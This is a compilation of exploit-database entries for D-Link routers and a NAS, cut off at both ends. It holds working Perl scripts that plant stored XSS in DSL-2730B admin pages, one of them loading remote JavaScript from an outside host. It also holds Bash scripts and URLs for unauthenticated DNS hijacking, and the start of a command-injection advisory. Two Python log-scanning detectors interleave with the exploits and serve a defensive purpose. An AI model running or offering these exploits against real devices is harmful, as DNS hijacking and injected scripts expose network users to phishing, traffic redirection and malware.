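# Combined log format: client, ident, authenticated user, [time], "request", status, bytes.
LOG_RE = re.compile(r'(\S+) \S+ (\S+) \[[^\]]*\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def audit_log(lines):
    """Return (client, account, path, summary) for every request the policy would have
    refused but the device answered with 200."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, account, target, status = m.groups()
        url = urlsplit(target)
        params = parse_qs(url.query)
        if status == "200" and not is_allowed(account, url.path, params):
            findings.append((client, account, url.path, describe(url.path, params)))
    return findings


# Constructed log lines replaying this advisory's PoC URLs (203.0.113.x stands in for
# the attacker's DNS servers); the encoded password values are the ones quoted above.
SAMPLE_LOG = [
    '192.168.1.23 - user [01/Mar/2017:09:12:04 +0530] "GET /dnscfg.cgi?dnsPrimary=203.0.113.5&dnsSecondary=203.0.113.6&dnsIfcsList=&dnsRefresh=1 HTTP/1.1" 200 1432',
    '192.168.1.23 - user [01/Mar/2017:09:13:51 +0530] "GET /password.cgi?inUserName=admin&inPassword=ZGFyZWFkbWluMQ==&inOrgPassword=ZGFyZWFkbWlu HTTP/1.1" 200 980',
    '192.168.1.23 - user [01/Mar/2017:09:14:02 +0530] "GET /lancfg2.cgi?ethIpAddress=192.168.1.1&ethSubnetMask=255.255.255.0&enblLanFirewall=0&enblDhcpSrv=1 HTTP/1.1" 200 1210',
    '192.168.1.7 - admin [01/Mar/2017:09:20:30 +0530] "GET /dnscfg.cgi?dnsPrimary=192.168.1.1&dnsSecondary=&dnsIfcsList=&dnsRefresh=1 HTTP/1.1" 200 1432',
    '192.168.1.23 - user [01/Mar/2017:09:22:10 +0530] "GET /password.cgi?inUserName=user&inPassword=ZGFyZXVzZXIx&inOrgPassword=ZGFyZXVzZXI= HTTP/1.1" 200 980',
    '192.168.1.23 - user [01/Mar/2017:09:23:45 +0530] "GET /info.html HTTP/1.1" 200 3301',
]

if __name__ == "__main__":
    for client, account, path, summary in audit_log(SAMPLE_LOG):
        print(f"{client} as '{account}' -> {path}: {summary}")
```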
            
# Exploit Title: D-Link DSL-2730B Modem wlsecrefresh.wl & wlsecurity.wl Exploit XSS Injection Stored
# Date: 11-01-2015
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.dlink.com
# Hardware version: C1
# Version: GE 1.01
# Tested on: Windows 8 and Linux

#!/usr/bin/perl
#
# Date dd-mm-yyyy: 11-11-2014
# Exploit for D-Link DSL-2730B
# Cross Site Scripting (XSS Injection) Stored in wlsecrefresh.wl
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
# More information: www.xlabs.com.br/blog/?p=339
#
# CAUTION!
# This exploit disables some features of the modem, forcing the
# administrator of the device to access the page to reconfigure the modem;
# the script then executes in the browsers of internal network users.
#
# Use with caution!
# Use at your own risk!
#



use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Headers;
use URI::Escape;

my $ip   = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];
my $opt  = $ARGV[3];
# strip a trailing slash from the base URL
$ip = $1 if (defined $ip && $ip =~ /(.*)\/$/);

if (@ARGV != 4) {
    print "\n";
    print "XLabs Information Security www.xlabs.com.br\n";
    print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in wlsecrefresh.wl\n";
    print "Developed by Mauricio Correa\n";
    print "Contact: mauricio\@xlabs.com.br\n";
    print "Usage: perl $0 http:\/\/host_ip\/ user pass option\n";
    print "\n";
    print "Options: 1 - Parameter: wlAuthMode \n";
    print "   2 - Parameter: wl_wsc_reg \n ";
    print "   3 - Parameter: wl_wsc_mode \n";
    print "   4 - Parameter: wlWpaPsk (Execute on click to exibe Wireless password) \n";
} else {
    print "XLabs Information Security www.xlabs.com.br\n";
    print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in wlsecrefresh.wl\n";
    print "Developed by Mauricio Correa\n";
    print "Contact: mauricio\@xlabs.com.br\n";
    print "[+] Exploring $ip\/ ...\n";

    my $payload = "%27;alert(%27\/\/XLabsSec%27);\/\/";
    my $ua   = LWP::UserAgent->new;
    my $hdrs = HTTP::Headers->new( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );
    $hdrs->authorization_basic($user, $pass);

    chomp($ip);

    print "[+] Preparing...\n";
    my $url_and_payload = "";

    # each option places the payload in a different parameter of the form
    if ($opt == 1) {
        $url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled&wl_wsc_reg=disabled&wlAuth=0&wlAuthMode=1$payload" .
                           "&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";
    } elsif ($opt == 2) {
        $url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled&wl_wsc_reg=disabled$payload&wlAuth=0&wlAuthMode=997354" .
                           "&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";
    } elsif ($opt == 3) {
        $payload = "%27;alert(%27\/\/XLabsSec%27);\/\/";
        $url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled$payload&wl_wsc_reg=disabled&wlAuth=0&wlAuthMode=997354" .
                           "&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";
    } elsif ($opt == 4) {
        $payload = "GameOver%3Cscript%20src%3D%22http%3A%2f%2fxlabs.com.br%2fxssi.js%22%3E%3C%2fscript%3E";
        $url_and_payload = "$ip/wlsecurity.wl?wl_wsc_mode=enabled&wl_wsc_reg=disabled&wsc_config_state=0&wlAuthMode=psk%20psk2&wlAuth=0&" .
                           "wlWpaPsk=$payload&wlWpaGtkRekey=0&wlNetReauth=36000&wlWep=disabled&wlWpa=aes&wlKeyBit=0&wlPreauth=0&" .
                           "wlSsidIdx=0&wlSyncNvram=1";
    } else {
        print "[-] Chose one option!\n";
        exit;
    }

    my $req = HTTP::Request->new("GET", $url_and_payload, $hdrs);

    print "[+] Prepared!\n";
    print "[+] Requesting...\n";
    my $resp = $ua->request($req);
    if ($resp->is_success) {
        print "[+] Successfully Requested!\n";

        my $resposta = $resp->as_string;

        print "[+] Checking for properly explored...\n";
        my $url = "$ip/wlsecurity.html";
        $req = HTTP::Request->new("GET", $url, $hdrs);

        print "[+] Checking that was explored...\n";

        my $resp2 = $ua->request($req);

        if ($resp2->is_success) {
            my $result = $resp2->as_string;
            if ($opt == 4) {
                # the stored value is re-escaped by the page, so compare against that form
                $payload = "%27GameOver%3Cscript%20src%3D%5C%22http%3A%2f%2fxlabs.com.br%2fxssi.js%5C%22%3E%3C%2fscript%3E%27";
            }

            if (index($result, uri_unescape($payload)) != -1) {
                print "[+] Successfully Exploited!";
            } else {
                print "[-] Not Exploited!";
            }
        }
    } else {
        print "[-] Ops!\n";
        print $resp->message;
    }
}
            
# Exploit Title: D-Link DSL-2730B Modem dnsProxy.cmd Exploit XSS Injection Stored
# Date: 11-01-2015
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.dlink.com
# Hardware version: C1
# Version: GE 1.01
# Tested on: Windows 8 and Linux


#!/usr/bin/perl
#
# Date dd-mm-yyyy: 11-11-2014
# Exploit for D-Link DSL-2730B
# Cross Site Scripting (XSS Injection) Stored in dnsProxy.cmd
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
# More information: www.xlabs.com.br/blog/?p=339
#
# CAUTION!
# This exploit enables some features of the modem, forcing the
# administrator of the device to access the page to reconfigure the modem;
# the script then executes in the browsers of internal network users.
#
# Use with caution!
# Use at your own risk!
#
 

use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Headers;
use URI::Escape;

my $ip   = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];
# strip a trailing slash from the base URL
$ip = $1 if (defined $ip && $ip =~ /(.*)\/$/);

if (@ARGV != 3) {
    print "\n";
    print "XLabs Information Security www.xlabs.com.br\n";
    print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in dnsProxy.cmd\n";
    print "Developed by Mauricio Correa\n";
    print "Contact: mauricio\@xlabs.com.br\n";
    print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";
} else {
    print "XLabs Information Security www.xlabs.com.br\n";
    print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in dnsProxy.cmd\n";
    print "Developed by Mauricio Correa\n";
    print "Contact: mauricio\@xlabs.com.br\n";
    print "[+] Exploring $ip\/ ...\n";

    my $payload = "%27;alert(%27XLabsSec%27);\/\/";
    my $ua   = LWP::UserAgent->new;
    my $hdrs = HTTP::Headers->new( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );
    $hdrs->authorization_basic($user, $pass);

    chomp($ip);

    print "[+] Preparing...\n";

    # first request: fetch the page so the sessionKey it embeds can be reused
    my $url = "$ip/dnsProxy.cmd?enblDproxy=1&hostname=Broadcom&domainname=A";
    my $req = HTTP::Request->new("GET", $url, $hdrs);

    print "[+] Prepared!\n";
    print "[+] Requesting...\n";
    my $resp = $ua->request($req);

    if ($resp->is_success) {
        print "[+] Successfully Requested!\n";

        my $resposta = $resp->as_string;

        print "[+] Obtain session key...\n";
        my $token = "";
        if ($resposta =~ /sessionKey=(.*)\';/) {
            $token = $1;
            print "[+] Session key found: $token\n";
        } else {
            print "[-] Session key not found!\n";
            exit;
        }

        print "[+] Preparing exploit...\n";
        my $url_and_xpl = "$ip/dnsProxy.cmd?enblDproxy=1&hostname=Broadcom&domainname=XSS$payload&sessionKey=$token";
        $req = HTTP::Request->new("GET", $url_and_xpl, $hdrs);

        print "[+] Prepared!\n";
        print "[+] Exploiting...\n";
        my $resp2 = $ua->request($req);

        if ($resp2->is_success) {
            my $resultado = $resp2->as_string;
            if (index($resultado, uri_unescape($payload)) != -1) {
                print "[+] Successfully Exploited!";
            } else {
                print "[-] Not Exploited!";
            }
        }
    } else {
        print "[-] Ops!\n";
        print $resp->message;
    }
}
            
# Exploit Title: D-Link DSL-2730B Modem lancfg2get.cgi Exploit XSS Injection Stored
# Date: 11-01-2015
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.dlink.com
# Hardware version: C1
# Version: GE 1.01
# Tested on: Windows 8 and Linux
 

#!/usr/bin/perl
#
# Date dd-mm-yyyy: 11-11-2014
# Exploit for D-Link DSL-2730B
# Cross Site Scripting (XSS Injection) Stored in lancfg2get.cgi
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
# More information: www.xlabs.com.br/blog/?p=339
#
# CAUTION!
# This exploit disables some features of the modem,
# forcing the administrator of the device to access the page and reconfigure the modem,
# at which point the script executes in the browsers of internal network users.
#
# Use with caution!
# Use at your own risk!
#


use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use URI::Escape;

my $ip = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];

# Strip a trailing slash from the base URL (guarded so a missing argument
# does not trigger an "uninitialized value" warning before the usage check).
$ip = $1 if(defined $ip && $ip=~/(.*)\/$/);

if (@ARGV != 3){
    print "\n";
    print "XLabs Information Security www.xlabs.com.br\n";
    print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in lancfg2get.cgi\n";
    print "Developed by Mauricio Correa\n";
    print "Contact: mauricio\@xlabs.com.br\n";
    print "Usage: perl $0 http:\/\/host_ip\/ user pass\n";
}else{
    print "XLabs Information Security www.xlabs.com.br\n";
    print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in lancfg2get.cgi\n";
    print "Developed by Mauricio Correa\n";
    print "Contact: mauricio\@xlabs.com.br\n";
    print "[+] Exploring $ip\/ ...\n";

    my $payload = "%27;alert(%27XLabsSec%27);\/\/";

    my $ua = new LWP::UserAgent;
    my $hdrs = new HTTP::Headers( Accept => 'text/plain', UserAgent => "XLabs Security Exploit Browser/1.0" );

    $hdrs->authorization_basic($user, $pass);

    chomp($ip);

    print "[+] Preparing exploit...\n";

    my $url_and_xpl = "$ip/lancfg2get.cgi?brName=$payload";

    my $req = new HTTP::Request("GET",$url_and_xpl,$hdrs);

    print "[+] Prepared!\n";

    print "[+] Requesting and Exploiting...\n";

    my $resp = $ua->request($req);

    if ($resp->is_success){
        print "[+] Successfully Requested!\n";

        # Fetch the page that renders the stored value and look for the payload.
        my $url = "$ip/lancfg2.html";

        $req = new HTTP::Request("GET",$url,$hdrs);

        print "[+] Checking that was explored...\n";

        my $resp2 = $ua->request($req);

        if ($resp2->is_success){
            my $resultado = $resp2->as_string;

            if(index($resultado, uri_unescape($payload)) != -1){
                print "[+] Successfully Exploited!";
            }else{
                print "[-] Not Exploited!";
            }
        }
    }else {
        print "[-] Ops!\n";
        print $resp->message;
    }
}
            
  D-Link DSL-2730B AU_2.01 
  Authentication Bypass DNS Change

  Copyright 2015 (c) Todor Donev 
  <todor.donev at gmail.com>
  http://www.ethical-hacker.org/
  https://www.facebook.com/ethicalhackerorg

  Disclaimer:
  This program, like previous ones, is for educational
  purposes ONLY. Do not use it without permission.
  The usual disclaimer applies, especially the
  fact that Todor Donev is not liable for any
  damages caused by direct or indirect use of the
  information or functionality provided by these
  programs. The author or any Internet provider
  bears NO responsibility for content or misuse
  of these programs or any derivatives thereof.
  By using these programs you accept the fact
  that any damage (dataloss, system crash,
  system compromise, etc.) caused by the use
  of these programs is not Todor Donev's
  responsibility.
  
  Use them at your own risk!

  This security hole allows an attacker to bypass
  authentication and change the DNS settings. When the
  administrator is logged in to the web management
  interface, an attacker may be able to completely
  bypass the authentication phase and connect to the
  web management interface with the administrator's
  credentials. This attack can also be performed
  by an external attacker who connects to the
  router's public IP address, if remote management
  is enabled. To change the DNS without logging
  into the web management interface use the following URL:
  
http://TARGET/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=
            
#!/bin/bash
#
#   D-Link ADSL DSL-2640U IM_1.00
#   Unauthenticated Remote DNS Change Exploit
#
#  Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>
#  https://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#
#  Description:  
#  The vulnerability exists in the web interface, which is 
#  accessible without authentication. 
#
#  Once modified, systems use foreign DNS servers,  which are 
#  usually set up by cybercriminals. Users with vulnerable 
#  systems or devices who try to access certain sites are 
#  instead redirected to possibly malicious sites.
#  
#  Modifying systems' DNS settings allows cybercriminals to 
#  perform malicious activities like:
#
#    o  Steering unknowing users to bad sites: 
#       These sites can be phishing pages that 
#       spoof well-known sites in order to 
#       trick users into handing out sensitive 
#       information.
#
#    o  Replacing ads on legitimate sites: 
#       Visiting certain sites can serve users 
#       with infected systems a different set 
#       of ads from those whose systems are 
#       not infected.
#   
#    o  Controlling and redirecting network traffic: 
#       Users of infected systems may not be granted 
#       access to download important OS and software 
#       updates from vendors like Microsoft and from 
#       their respective security vendors.
#
#    o  Pushing additional malware: 
#       Infected systems are more prone to other 
#       malware infections (e.g., FAKEAV infection).
#
#  Disclaimer:
#  This program, like previous ones, is for educational 
#  purposes ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the 
#  fact that Todor Donev is not liable for any 
#  damages caused by direct or indirect use of the 
#  information or functionality provided by these 
#  programs. The author or any Internet provider 
#  bears NO responsibility for content or misuse 
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact 
#  that any damage (dataloss, system crash, 
#  system compromise, etc.) caused by the use 
#  of these programs is not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#  

if [[ $# -gt 3 || $# -lt 2 ]]; then
        echo "               D-Link ADSL DSL-2640U IM_1.00 " 
        echo "           Unauthenticated Remote DNS Change Exploit"
        echo "  ==================================================================="
        echo "  Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
        echo "  Example: $0 133.7.133.7 8.8.8.8"
        echo "  Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
        echo ""
        echo "      Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
        echo "  https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
        exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
        echo "  Error : libwww-perl not found =/"
        exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
            
#
#
#  D-Link DSL-2640R Unauthenticated Remote DNS Change Vulnerability
#
#  Firmware Version: UK_1.06 Hardware Version: B1
#
#  Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
#
#  https://ethical-hacker.org/
#  https://facebook.com/ethicalhackerorg/
#
#  Description:  
#  The vulnerability exists in the web interface.
#  D-Link's various routers are susceptible to unauthorized DNS change. 
#  The problem occurs when an invalid / wrong user name and password are entered.
#
#  ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link 
#  DEVICES MAY BE AFFECTED.
#
#  Once modified, systems use foreign DNS servers,  which are 
#  usually set up by cybercriminals. Users with vulnerable 
#  systems or devices who try to access certain sites are 
#  instead redirected to possibly malicious sites.
#  
#  Modifying systems' DNS settings allows cybercriminals to 
#  perform malicious activities like:
#
#    o  Steering unknowing users to bad sites: 
#       These sites can be phishing pages that 
#       spoof well-known sites in order to 
#       trick users into handing out sensitive 
#       information.
#
#    o  Replacing ads on legitimate sites: 
#       Visiting certain sites can serve users 
#       with infected systems a different set 
#       of ads from those whose systems are 
#       not infected.
#   
#    o  Controlling and redirecting network traffic: 
#       Users of infected systems may not be granted 
#       access to download important OS and software 
#       updates from vendors like Microsoft and from 
#       their respective security vendors.
#
#    o  Pushing additional malware: 
#       Infected systems are more prone to other 
#       malware infections (e.g., FAKEAV infection).
#
#  

Proof of Concept:

http://<TARGET>/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=<MALICIOUS DNS>&dnsSecondary=<MALICIOUS DNS>
            
#!/bin/bash
#
#   D-Link ADSL DSL-2640B GE_1.07
#   Unauthenticated Remote DNS Change Exploit
#
#  Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>
#  https://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#
#  Description:  
#  The vulnerability exists in the web interface, which is 
#  accessible without authentication. 
#
#  Once modified, systems use foreign DNS servers,  which are 
#  usually set up by cybercriminals. Users with vulnerable 
#  systems or devices who try to access certain sites are 
#  instead redirected to possibly malicious sites.
#  
#  Modifying systems' DNS settings allows cybercriminals to 
#  perform malicious activities like:
#
#    o  Steering unknowing users to bad sites: 
#       These sites can be phishing pages that 
#       spoof well-known sites in order to 
#       trick users into handing out sensitive 
#       information.
#
#    o  Replacing ads on legitimate sites: 
#       Visiting certain sites can serve users 
#       with infected systems a different set 
#       of ads from those whose systems are 
#       not infected.
#   
#    o  Controlling and redirecting network traffic: 
#       Users of infected systems may not be granted 
#       access to download important OS and software 
#       updates from vendors like Microsoft and from 
#       their respective security vendors.
#
#    o  Pushing additional malware: 
#       Infected systems are more prone to other 
#       malware infections (e.g., FAKEAV infection).
#
#  Disclaimer:
#  This program, like previous ones, is for educational 
#  purposes ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the 
#  fact that Todor Donev is not liable for any 
#  damages caused by direct or indirect use of the 
#  information or functionality provided by these 
#  programs. The author or any Internet provider 
#  bears NO responsibility for content or misuse 
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact 
#  that any damage (dataloss, system crash, 
#  system compromise, etc.) caused by the use 
#  of these programs is not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#  

if [[ $# -gt 3 || $# -lt 2 ]]; then
        echo "               D-Link ADSL DSL-2640B GE_1.07 " 
        echo "           Unauthenticated Remote DNS Change Exploit"
        echo "  ==================================================================="
        echo "  Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
        echo "  Example: $0 133.7.133.7 8.8.8.8"
        echo "  Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
        echo ""
        echo "      Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
        echo "  https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
        exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
        echo "  Error : libwww-perl not found =/"
        exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
            
#!/bin/bash
#
#  D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit
#
#  Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
#  http://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#  
#  Description:  
#  Different D-Link Routers are vulnerable to DNS change.
#  The vulnerability exists in the web interface, which is 
#  accessible without authentication. 
#
#  Tested firmware version: EU_2.03
#  ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link 
#  DEVICES OR FIRMWARE VERSIONS MAY BE AFFECTED.
#
#  Once modified, systems use foreign DNS servers,  which are 
#  usually set up by cybercriminals. Users with vulnerable 
#  systems or devices who try to access certain sites are 
#  instead redirected to possibly malicious sites.
#  
#  Modifying systems' DNS settings allows cybercriminals to 
#  perform malicious activities like:
#
#    o  Steering unknowing users to bad sites: 
#       These sites can be phishing pages that 
#       spoof well-known sites in order to 
#       trick users into handing out sensitive 
#       information.
#
#    o  Replacing ads on legitimate sites: 
#       Visiting certain sites can serve users 
#       with infected systems a different set 
#       of ads from those whose systems are 
#       not infected.
#   
#    o  Controlling and redirecting network traffic: 
#       Users of infected systems may not be granted 
#       access to download important OS and software 
#       updates from vendors like Microsoft and from 
#       their respective security vendors.
#
#    o  Pushing additional malware: 
#       Infected systems are more prone to other 
#       malware infections (e.g., FAKEAV infection).
#
#  Disclaimer:
#  This program, like previous ones, is for educational
#  purposes ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor Donev is not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality provided by these
#  programs. The author or any Internet provider
#  bears NO responsibility for content or misuse
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact
#  that any damage (dataloss, system crash,
#  system compromise, etc.) caused by the use
#  of these programs is not Todor Donev's
#  responsibility.
#
#  Use them at your own risk!
#
     

if [[ $# -gt 3 || $# -lt 2 ]]; then
        echo "     D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit"
        echo "  ================================================================"
        echo "  Usage: $0 <Target> <Preferred DNS> <Alternate DNS>"
        echo "  Example: $0 192.168.1.1 8.8.8.8"
        echo "  Example: $0 192.168.1.1 8.8.8.8 8.8.4.4"
        echo ""
        echo "     Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>"
        echo "                  http://www.ethical-hacker.org/"
        echo "             https://www.facebook.com/ethicalhackerorg"
        exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
        echo "  Error : libwww-perl not found =/"
        exit;
fi
GET "http://$1/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP" 0&> /dev/null <&1
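The four DNS-change advisories above all reduce to a single unauthenticated GET against a configuration endpoint (dnscfg.cgi, Forms/dns_1 or ddnsmngr.cmd). Where such devices sit behind a reverse proxy, or where an IDS or proxy exports HTTP logs in Common Log Format, that request is straightforward to spot. The Python below is an added example, not part of Todor Donev's scripts: it parses CLF lines, matches the three endpoint paths named in the advisories, and flags any request whose dnsPrimary/dnsSecondary values fall outside an operator allow-list, or that turns off DHCP-provided resolvers with dnsDynamic=0. The log lines and the allow-list are constructed for the example; nothing here comes from a real capture.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint paths named in the advisories above.
DNS_CHANGE_PATHS = {"/dnscfg.cgi", "/ddnsmngr.cmd", "/Forms/dns_1"}
# Query parameters that carry a resolver address on those endpoints.
DNS_PARAMS = ("dnsPrimary", "dnsSecondary")

# Common Log Format: src ident user [time] "METHOD target proto" status size
_CLF = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)


def analyse_log_line(line, allowed_resolvers):
    """Return a finding dict for a suspicious DNS-change request, else None.

    A hit on a known endpoint is flagged when any dnsPrimary/dnsSecondary
    value is outside `allowed_resolvers`, or when dnsDynamic=0 is sent
    (which replaces the DHCP-learned resolvers with the static ones)."""
    m = _CLF.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path not in DNS_CHANGE_PATHS:
        return None
    qs = parse_qs(url.query, keep_blank_values=True)
    resolvers = [v for p in DNS_PARAMS for v in qs.get(p, []) if v]
    rogue = [r for r in resolvers if r not in allowed_resolvers]
    dynamic_off = qs.get("dnsDynamic", [""])[0] == "0"
    if not rogue and not dynamic_off:
        return None
    return {
        "src": m.group("src"),
        "time": m.group("time"),
        "path": url.path,
        "resolvers": resolvers,
        "rogue": rogue,
        "dynamic_off": dynamic_off,
        "status": int(m.group("status")),
    }


def scan(lines, allowed_resolvers):
    """Run analyse_log_line over an iterable of CLF lines and keep the findings."""
    findings = []
    for line in lines:
        finding = analyse_log_line(line, allowed_resolvers)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample lines (not from any real device or capture). Addresses
# are from the RFC 5737 documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2018:12:00:01 +0000] "GET /dnscfg.cgi?dnsPrimary=198.51.100.53&dnsSecondary=198.51.100.54&dnsDynamic=0&dnsRefresh=1 HTTP/1.1" 200 512',
    '192.168.1.20 - - [10/Jan/2018:12:00:02 +0000] "GET /index.html HTTP/1.1" 200 2048',
    '203.0.113.5 - - [10/Jan/2018:12:00:03 +0000] "GET /Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=198.51.100.53&dnsSecondary=198.51.100.53 HTTP/1.1" 302 0',
    '192.168.1.20 - - [10/Jan/2018:12:00:04 +0000] "GET /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=192.168.1.1&dnsSecondary=&dnsDynamic=1&dnsRefresh=1&dns6Type=DHCP HTTP/1.1" 200 100',
]

# The resolver(s) the operator actually configured (constructed value).
ALLOWED = {"192.168.1.1"}

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG, ALLOWED):
        print("%s %s -> %s rogue=%s dynamic_off=%s status=%d"
              % (f["time"], f["src"], f["path"], f["rogue"], f["dynamic_off"], f["status"]))
```

On the constructed input the first and third lines are reported (rogue resolvers from an external source address), the second is not a DNS endpoint, and the fourth is the operator's own legitimate change and stays quiet. The status code is kept in the finding because a 200 or 302 from these endpoints, unlike a 401, tells you the device accepted the change.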
            
D-Link DNS-343 ShareCenter Remote Root

Vendor: D-Link
Product: D-Link DNS-343 ShareCenter
Version: <= 1.05
Website: http://sharecenter.dlink.com/products/DNS-343


###########################################################################
                     ______      ____________          __  
                    / ____/_  __/ / __/_  __/__  _____/ /_ 
                   / / __/ / / / / /_  / / / _ \/ ___/ __ \
                  / /_/ / /_/ / / __/ / / /  __/ /__/ / / /         
                  \____/\__,_/_/_/   /_/  \___/\___/_/ /_/ 
                                                                
                     GulfTech Research and Development                                                                 

###########################################################################
#          D-Link DNS-343 ShareCenter <= 1.05 Command Injection           #
###########################################################################
 

Released Date: 2017-01-15
Last Modified: 2017-06-22
 Company Info: D-Link
 Version Info: 
              Vulnerable
               D-Link DNS-343 ShareCenter <= 1.05


--[ Table of contents

00 - Introduction
    00.1 Background

01 - Command Injection
    01.1 - Vulnerable code analysis
    01.2 - Remote exploitation

02 - Credit

03 - Proof of concept

04 - Solution

05 - Contact information


--[ 00 - Introduction

The purpose of this article is to detail the research that I have recently 
completed regarding the D-Link DNS 343 ShareCenter.

--[ 00.1 - Background

The D-Link ShareCenter 4-Bay Network Storage Enclosure (DNS-343) connects 
to your network instead of to a computer so everyone on your network can 
back up content to one central location. Plus, it lets you share your 
stored content across your network and over the Internet so family members, 
friends and employees can access it no matter where they are.


--[ 01 - Command Injection

Within the DNS-343 web directory is a folder named "maintenance" that
contains a number of ASP scripts that are related to maintenance tasks that
can be performed. The script by the name of "test_mail.asp" caught my 
attention, and that is what we will focus on for now.

--[ 01.1 - Vulnerable code analysis

The DNS-343 utilizes the goAhead web server, which contains a functionality
called goForms, which basically stores CGI in memory. This is important to
know as the previously mentioned "test_mail.asp" posts directly to the
"/goform/Mail_Test" endpoint. Code for this particular goForm can be found
within the "webs" binary.

int __fastcall sub_27D24(int a1)
{
  int v1; // r4@1
  int *v2; // r10@1
  char *v3; // r8@1
  char *v4; // r6@1
  char *v5; // r5@1
  char *v6; // r7@1
  int v7; // r12@1
  char *v8; // r0@4
  char *v10; // [sp+10h] [bp-230h]@1
  char *v11; // [sp+14h] [bp-22Ch]@1
  char s; // [sp+18h] [bp-228h]@4

  v1 = a1;
  v2 = &dword_8D968;
  v3 = sub_4D340(a1, (int)"f_auth", &byte_7F4B4);
  v11 = sub_4D340(v1, (int)"f_username", &byte_7F4B4);
  v10 = sub_4D340(v1, (int)"f_password", &byte_7F4B4);
  v4 = sub_4D340(v1, (int)"f_smtpserver", &byte_7F4B4);
  v5 = sub_4D340(v1, (int)"f_sender", &byte_7F4B4);
  v6 = sub_4D340(v1, (int)"f_sendto", &byte_7F4B4);
  system("rm /tmp/email_*");
  v7 = (unsigned __int8)*v3 - 49;
  if ( *v3 == 49 )
    v7 = (unsigned __int8)v3[1];
  if ( v7 )
  {
